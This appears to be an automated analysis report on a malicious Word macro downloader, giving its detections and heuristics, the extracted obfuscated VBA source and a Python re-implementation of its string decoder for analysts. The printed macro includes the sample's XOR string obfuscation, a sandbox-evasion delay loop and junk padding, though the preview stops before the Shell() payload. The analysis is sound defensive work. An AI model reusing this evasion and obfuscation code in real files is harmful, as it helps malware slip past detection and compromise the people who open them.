Verdict: MALICIOUS
Risk Score: 302

Malware Insights

MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing VBA macros. The critical OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics indicate that the Document_Open macro runs a command through the Shell() function as soon as the document is opened. This is the usual first stage of a downloader that fetches and executes further content, consistent with the ClamAV detection name Doc.Downloader.Adnel-6923089-0. The extracted source shows the supporting tradecraft: a custom XOR string decoder (IXBQ8rXi7) rebuilds its strings at run time, so the command line is not present as plaintext in the source; Document_Open first runs a busy-wait loop of 97,673,669 iterations, a delay intended to outlast sandbox timeouts; a never-called junk procedure (LJvPzGuIEvbDez) and a Declare statement for a random-looking library and export (CUg11kLP1XpZ / AzG6JC1HkOC) pad the module and confuse static signatures. The visible GetObject and CallByName calls sit inside that junk procedure, so those two hits reflect the padding rather than the execution path; the Shell() call itself lies beyond the truncated preview.
Heuristics (8)

- CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Downloader.Adnel-6923089-0
- OLE_VBA_MACROS (medium, 5 related findings): Document contains VBA macro code
- OLE_VBA_SHELL (critical): Shell() call in VBA
- OLE_VBA_DOCOPEN (high): Document_Open macro
- OLE_VBA_GETOBJ (high): GetObject call
- OLE_VBA_CALLBYNAME (high): CallByName call
- OLE_VBA_PCODE_AUTOEXEC_EXEC (high): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- EMBEDDED_URL (info): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All URLs below were found in document text (OLE body). They are XMP, RDF, Dublin Core, Photoshop, IEC and DrawingML namespace identifiers of the kind carried by embedded image metadata, not network indicators, and none of them was reached from macro code.
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/photoshop/1.0/
  - http://www.iec.ch
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36964 bytes | bab97032f27679ec7a2d4b36e936f6644ef19f3ae04eecb42f63380c1178f5e8 |

Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function JykTJQD4G2cOy8 Lib "CUg11kLP1XpZ" Alias "AzG6JC1HkOC" (ByVal YgAUarPfLxPdtCA As String, HTZKc23cQRC As Long) As Long
#Else
Private Declare Function JykTJQD4G2cOy8 lib "CUg11kLP1XpZ" Alias "AzG6JC1HkOC"(byval YgAUarPfLxPdtCA as String, HTZKc23cQRC as Long ) as Long
#End If
Sub LJvPzGuIEvbDez()
UKAYbwDZ57 = 12
PrjeFdHhj = 33 + 22 + 57 + 51
Beep
Err.Raise 11
Reset
Loc 36
GetObject 12, 85
If CDate(38) = True Then Nvyk5q05hN = 8078
HRmRG960xOhdF = CVErr(33)
DateAdd "R05hNTOz", 96, 31
BHfgxvQe0CWo = CVar(4)
HjMXrEGB7EIG = Day(12)
CallByName VOnl0L8H, 61, VbMethod, 12, 33, 22
Mr7DgjGS2s = UCase(57)
If CBool(51) = True Then SDwIEM9hCP9 = 94
Stop
WeekdayName 37
Weekday 84
LOzjsXjIJ0v6vo = Cos(10)
XE17KKuzTHoL = CVDate(69)
DatePart "NJ32Vn746", 61
ChDrive 83
LoadPicture 17, 45, 86, 62, 80
RgTjI5wZBmKNXtLZ = LCase(26)
Rate 16, 72, 76
FV 39, 77, 88
If CDec(4) = True Then V6Xugu2ek = 83
Command
IsDate 44
If CDbl(61) = True Then JyjarAm1V7y = 63
H16qDwlagaUNgmZ = CSng(59)
Load A00gFR6ds
MPi7q2sOqHMpNK = 51
REjVIp2fr3z1 = 41 + 97 + 28 + 63
End Sub
Function IXBQ8rXi7(ByVal AKCwkL As String, UmeZOQvT9 As String) As String
NcHt1P34 = 25
RDouSkfS = 73 + 73 + 26 + 42
On Error Resume Next
OFbMl1X7VZm5qH = 87
LlXCOfqQ1qOwG = 56 + 77 + 88 + 81
Dim ElmivNz() As Byte, L56ObCqtgE(0 To 285) As Integer, Comk() As Byte, BGqsIjn9Ar4W7tbNS, YSR3FY6aQILHBXlvq, FbuWg95k2F, B9JLDUu6bU8, V4EY3 As Boolean
Qqw9XZOphom = 71
Yuzaf = 80 + 7 + 27 + 67
ElmivNz = StrConv(AKCwkL, (64 + 1 + 64 - 1))
KjgW8N2pMAUPTc60c = 74
Fi2nVr35ba = 70 + 36 + 14 + 53
Comk() = StrConv(UmeZOQvT9, (64 + 4 + 64 - 4))
H49TBhCiIG = 25
WcZih9dmDTN = 43 + 88 + 78 + 35
YSR3FY6aQILHBXlvq = UBound(Comk)
RWo3yOnFmn = 17
IXSlOjD00MfNG = 48 + 28 + 34 + 18
For BGqsIjn9Ar4W7tbNS = 0 To (127.5 + 5 + 127.5 - 5)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS) = BGqsIjn9Ar4W7tbNS
Next BGqsIjn9Ar4W7tbNS
For BGqsIjn9Ar4W7tbNS = (128 + 8 + 128 - 8) To (142.5 + 8 + 142.5 - 8)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS) = BGqsIjn9Ar4W7tbNS Xor (128 + 2 + 128 - 2)
Next BGqsIjn9Ar4W7tbNS
For BGqsIjn9Ar4W7tbNS = 1 To (3 + 6 + 3 - 6)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS + (124.5 + 1 + 124.5 - 1)) = Comk(YSR3FY6aQILHBXlvq - BGqsIjn9Ar4W7tbNS)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS - 1) = Comk(BGqsIjn9Ar4W7tbNS - 1) Xor ((127.5 + 2 + 127.5 - 2) - Comk(YSR3FY6aQILHBXlvq - BGqsIjn9Ar4W7tbNS))
Next BGqsIjn9Ar4W7tbNS
V4EY3 = False
FbuWg95k2F = 0
B9JLDUu6bU8 = 0
For BGqsIjn9Ar4W7tbNS = 0 To UBound(ElmivNz)
If FbuWg95k2F > YSR3FY6aQILHBXlvq Then FbuWg95k2F = 0
If B9JLDUu6bU8 > (142.5 + 1 + 142.5 - 1) And V4EY3 = False Then B9JLDUu6bU8 = 0: V4EY3 = Not (V4EY3)
If B9JLDUu6bU8 > (142.5 + 4 + 142.5 - 4) And V4EY3 = True Then B9JLDUu6bU8 = (2.5 + 4 + 2.5 - 4): V4EY3 = Not (V4EY3)
ElmivNz(BGqsIjn9Ar4W7tbNS) = (ElmivNz(BGqsIjn9Ar4W7tbNS) Xor (L56ObCqtgE(B9JLDUu6bU8) Xor Comk(FbuWg95k2F)))
FbuWg95k2F = FbuWg95k2F + 1
B9JLDUu6bU8 = B9JLDUu6bU8 + 1
Next BGqsIjn9Ar4W7tbNS
BQ4X3YQb = 76
MdRZAL849TBhCi = 17 + 20 + 38 + 57
IXBQ8rXi7 = StrConv(ElmivNz(), (32 + 2 + 32 - 2))
Kl1fA = 37
IHiTDNOmV2vm = 8 + 21 + 35 + 66
End Function
Sub Document_Open()
NPUHgDq39g = 67
JzkEVf900xBR = 41 + 48 + 98 + 75
On Error Resume Next
HHsvV0SAXpLopC = 21
Lnnl8ewgIOG = 60 + 16 + 24 + 51
Dim BljIJUx8I5 As Long, MnDhCIs6Wf1q7p As Long, QJ9YpQevhGn As Long, P1ZZ6WLZ As Long
COpZ3hWr = 44
TqA1UeOSaVDnPEjUftu = 39 + 27 + 62 + 56
BljIJUx8I5 = 97673669: MnDhCIs6Wf1q7p = 0: QJ9YpQevhGn = 0
AioxM21uwTiOWQmiN = 97
NTpNi = 4 + 87 + 35 + 64
For MnDhCIs6Wf1q7p = 1 To BljIJUx8I5
QJ9YpQevhGn = QJ9YpQevhGn + 1
Next MnDhCIs6Wf1q7p
WcxI7EcvaPM8AQKU = 58
GzIxmaFC0aQj1 = 69 + 62 + 84 + 17
If QJ9YpQevhGn = BljIJUx8I5 Then
FL72KDOpvBzTBo5O2 = 55
UYzd0ANInn = 4 + 59 + 19 + 87
Dim RCyBgh8j5qV
... (truncated)
```
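The function IXBQ8rXi7 in the preview is the sample's string decoder: the arithmetic expressions in it evaluate to the constants 255, 256, 285, 6, 249, 5, 128 (vbFromUnicode) and 64 (vbUnicode), and what remains is a 286-entry lookup table seeded from the last six key bytes and a XOR stream whose table index wraps alternately to 0 and to 5. The following Python re-implementation is an added example, not the analyzer's code and not the malware's own code; it lets an analyst decode the literal arguments once the truncated call sites are recovered from the full macros.bas. Because the transform is a plain XOR, it is its own inverse, so the demonstration uses the same routine to encode a constructed string and then recover it from a fake call site. Assumptions: StrConv() in the sample runs under a single-byte Western ANSI code page (modelled as latin-1), the call-site arguments are string literals, and the VBA "On Error Resume Next" behaviour of silently skipping an out-of-range Comk() access for keys shorter than seven bytes is reproduced with an explicit bounds check.

```python
"""Re-implementation of the XOR string decoder IXBQ8rXi7 from the extracted macro.

Added example; not the analyzer's code and not the malware's own code.
Assumptions: StrConv() uses a single-byte Western ANSI code page (latin-1 here)
and call-site arguments are string literals.
"""
import re

TABLE_SIZE = 286            # L56ObCqtgE(0 To 285) As Integer


def build_table(key: bytes) -> list:
    """Rebuild the 286-entry array the macro derives from the key.

    Slots 0..255 hold their own index, 256..285 hold index Xor 256 (0..29),
    then the last six key bytes are mixed into slots 250..255 and 0..5.
    """
    ub = len(key) - 1                                   # UBound(Comk)
    table = list(range(256))
    table += [i ^ 256 for i in range(256, TABLE_SIZE)]
    for i in range(1, 7):                               # For ... = 1 To 6
        src = ub - i
        # Comk(ub - i) is out of range for keys shorter than 7 bytes; VBA raises
        # "Subscript out of range" and On Error Resume Next skips the statement.
        if src < 0:
            continue
        table[i + 249] = key[src]
        table[i - 1] = key[i - 1] ^ (255 - key[src])
    return table


def xor_transform(data: bytes, key: bytes) -> bytes:
    """Apply the macro's keystream: out[i] = in[i] ^ (table[t] ^ key[k])."""
    if not key:
        raise ValueError("key must not be empty")
    table = build_table(key)
    ub = len(key) - 1
    out = bytearray(data)
    k = 0              # FbuWg95k2F: key index, wraps to 0 past UBound(Comk)
    t = 0              # B9JLDUu6bU8: table index, wraps to 0 and to 5 alternately
    flip = False       # V4EY3
    for i in range(len(out)):
        if k > ub:
            k = 0
        if t > 285 and not flip:
            t, flip = 0, True
        if t > 285 and flip:
            t, flip = 5, False
        out[i] ^= table[t] ^ key[k]
        k += 1
        t += 1
    return bytes(out)


def ixbq8rxi7(text: str, key: str, codepage: str = "latin-1") -> str:
    """String-level equivalent of IXBQ8rXi7(text, key), including the
    StrConv vbFromUnicode / vbUnicode steps (codepage is an assumption)."""
    return xor_transform(text.encode(codepage), key.encode(codepage)).decode(codepage)


# IXBQ8rXi7("<blob>", "<key>") with two literal arguments; VBA escapes " as "".
CALL_RE = re.compile(r'IXBQ8rXi7\s*\(\s*"((?:[^"]|"")*)"\s*,\s*"((?:[^"]|"")*)"\s*\)')


def decode_call_sites(vba_source: str) -> list:
    """Return [(key, decoded_string), ...] for every literal call site found."""
    found = []
    for m in CALL_RE.finditer(vba_source):
        blob, key = (g.replace('""', '"') for g in m.groups())
        found.append((key, ixbq8rxi7(blob, key)))
    return found


if __name__ == "__main__":
    # Constructed demonstration: encode a harmless string with the same routine,
    # embed it in a fake call site, then recover it the way an analyst would.
    key = "ABCDEFG"
    secret = "constructed demo string, not an indicator recovered from the sample"
    blob = ixbq8rxi7(secret, key).replace('"', '""')
    fake_source = f'x = IXBQ8rXi7("{blob}", "{key}")'
    for k, s in decode_call_sites(fake_source):
        print(f"key={k!r}: {s!r}")
```

To use it on the real artifact, run decode_call_sites over the full macros.bas text; call sites that pass variables or Chr()-built strings instead of literals will not match the regular expression and need the arguments evaluated first.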